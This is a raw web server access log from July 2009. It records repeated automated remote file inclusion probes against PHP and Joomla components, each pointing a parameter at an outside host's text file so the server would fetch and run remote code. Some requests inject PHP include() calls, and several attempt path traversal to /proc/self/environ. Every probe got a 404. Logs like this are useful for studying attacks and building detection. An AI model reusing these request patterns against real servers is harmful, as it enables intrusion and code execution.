200.101.70.1 - - [13/Jul/2009:00:47:23 -0400] "GET //components/com_colorlab/admin.color.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:47:28 -0400] "GET /logs/access_log.Q109052100//components/com_colorlab/admin.color.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:47:28 -0400] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:00:48:11 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:48:15 -0400] "GET /logs/access_log.Q109052100%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:00:48:31 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:00:48:37 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:00:48:38 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:48:43 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:48:43 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:48:43 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:48:45 -0400] "GET /logs/access_log.Q109062200%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:48:45 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:48:46 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:48:48 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:48:48 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:48:48 -0400] "GET /logs/access_log.Q109062200%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:48:48 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:48:48 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:48:48 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:49:06 -0400] "GET /logs/access_log.Q109063000//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:49:06 -0400] "GET /logs/access_log.Q109063000//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
67.176.12.166 - - [13/Jul/2009:00:49:15 -0400] "GET /logs/error_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
67.176.12.166 - - [13/Jul/2009:00:49:18 -0400] "GET /logs/error_log.Q109060700/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
67.176.12.166 - - [13/Jul/2009:00:49:30 -0400] "GET /logs/error_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 249 "-" "XXXXXX"
77.221.130.14 - - [13/Jul/2009:00:49:30 -0400] "GET /logs/access_log.Q109063000%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:49:31 -0400] "GET /logs/access_log.Q109063000%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
67.176.12.166 - - [13/Jul/2009:00:49:35 -0400] "GET /logs/error_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 249 "-" "XXXXXX"
59.22.140.17 - - [13/Jul/2009:00:49:46 -0400] "GET /logs/access_log.Q109061900%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:49:46 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:49:46 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.249.68.247 - - [13/Jul/2009:00:49:50 -0400] "GET /logs/access_log.Q107111600 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.221.130.14 - - [13/Jul/2009:00:50:05 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:50:06 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:50:07 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:50:07 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:50:07 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:50:07 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:50:07 -0400] "GET /logs/access_log.Q109063000//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:00:50:10 -0400] "GET /logs/access_log.Q109063000//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:50:21 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:50:21 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:50:21 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:50:25 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:00:50:36 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:50:36 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:50:36 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:50:36 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:50:40 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:00:50:41 -0400] "GET /logs/error_log.Q109052900///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
70.87.64.234 - - [13/Jul/2009:00:50:49 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:50:49 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:50:49 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:00:50:49 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:50:53 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:00:50:56 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:00:51:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.236.242.164 - - [13/Jul/2009:00:51:14 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:51:20 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:51:20 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:51:20 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:51:20 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:00:52:06 -0400] "GET /logs/error_log.Q109052900///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
211.236.242.164 - - [13/Jul/2009:00:52:16 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.13.246.7 - - [13/Jul/2009:00:52:16 -0400] "GET /logs/error_log.Q109060700/bemarket/postscript/postscript.php?p_mode=http://www.x-pronet.com/board/safe2.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
85.13.246.7 - - [13/Jul/2009:00:52:16 -0400] "GET /bemarket/postscript/postscript.php?p_mode=http://www.x-pronet.com/board/safe2.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
85.13.246.7 - - [13/Jul/2009:00:52:16 -0400] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://www.x-pronet.com/board/safe2.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
211.236.242.164 - - [13/Jul/2009:00:52:32 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:52:39 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:52:43 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:52:49 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:52:53 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:52:58 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:53:00 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:54:29 -0400] "GET /logs/access_log.Q109061900/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
87.98.222.18 - - [13/Jul/2009:00:55:20 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
87.98.222.18 - - [13/Jul/2009:00:55:20 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
87.98.222.18 - - [13/Jul/2009:00:55:20 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
209.59.12.99 - - [13/Jul/2009:00:56:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
59.22.140.17 - - [13/Jul/2009:00:56:24 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:56:38 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
87.98.222.18 - - [13/Jul/2009:00:56:43 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://carrster.com/auto/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
87.98.222.18 - - [13/Jul/2009:00:56:43 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://carrster.com/auto/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
87.98.222.18 - - [13/Jul/2009:00:56:43 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://carrster.com/auto/fx29id.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:56:44 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
87.98.222.18 - - [13/Jul/2009:00:56:48 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://carrster.com/auto/fx29id.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
87.98.222.18 - - [13/Jul/2009:00:58:19 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
87.98.222.18 - - [13/Jul/2009:00:58:19 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
87.98.222.18 - - [13/Jul/2009:00:58:19 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
200.101.70.1 - - [13/Jul/2009:00:58:41 -0400] "GET //components/com_colorlab/admin.color.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:58:41 -0400] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:58:41 -0400] "GET /logs/access_log.Q109052100//components/com_colorlab/admin.color.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
87.98.222.18 - - [13/Jul/2009:00:59:06 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
87.98.222.18 - - [13/Jul/2009:00:59:16 -0400] "GET /logs/access_log.Q109051300%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://carrster.com/auto/fx29id.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
87.98.222.18 - - [13/Jul/2009:00:59:16 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://carrster.com/auto/fx29id.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:59:21 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://articlecentralstation.com/ab.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
200.101.70.1 - - [13/Jul/2009:00:59:22 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://articlecentralstation.com/ab.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
200.101.70.1 - - [13/Jul/2009:00:59:23 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://articlecentralstation.com/ab.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
70.87.64.234 - - [13/Jul/2009:01:00:14 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:00:14 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:00:15 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:00:24 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:01:00:30 -0400] "GET /logs/access_log.Q109061100//components/com_colorlab/admin.color.php?mosConfig_live_site=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:00:30 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:00:30 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:00:30 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:00:39 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:00:41 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:00:41 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:00:41 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:00:52 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
85.13.246.7 - - [13/Jul/2009:01:01:02 -0400] "GET /logs/access_log.Q109060700/bemarket/postscript/postscript.php?p_mode=http://www.x-pronet.com/board/safe2.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
209.59.12.99 - - [13/Jul/2009:01:01:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.101.70.1 - - [13/Jul/2009:01:01:16 -0400] "GET /logs/access_log.Q109063000//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://articlecentralstation.com/ab.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
70.87.64.234 - - [13/Jul/2009:01:02:08 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:02:14 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:02:16 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:02:24 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
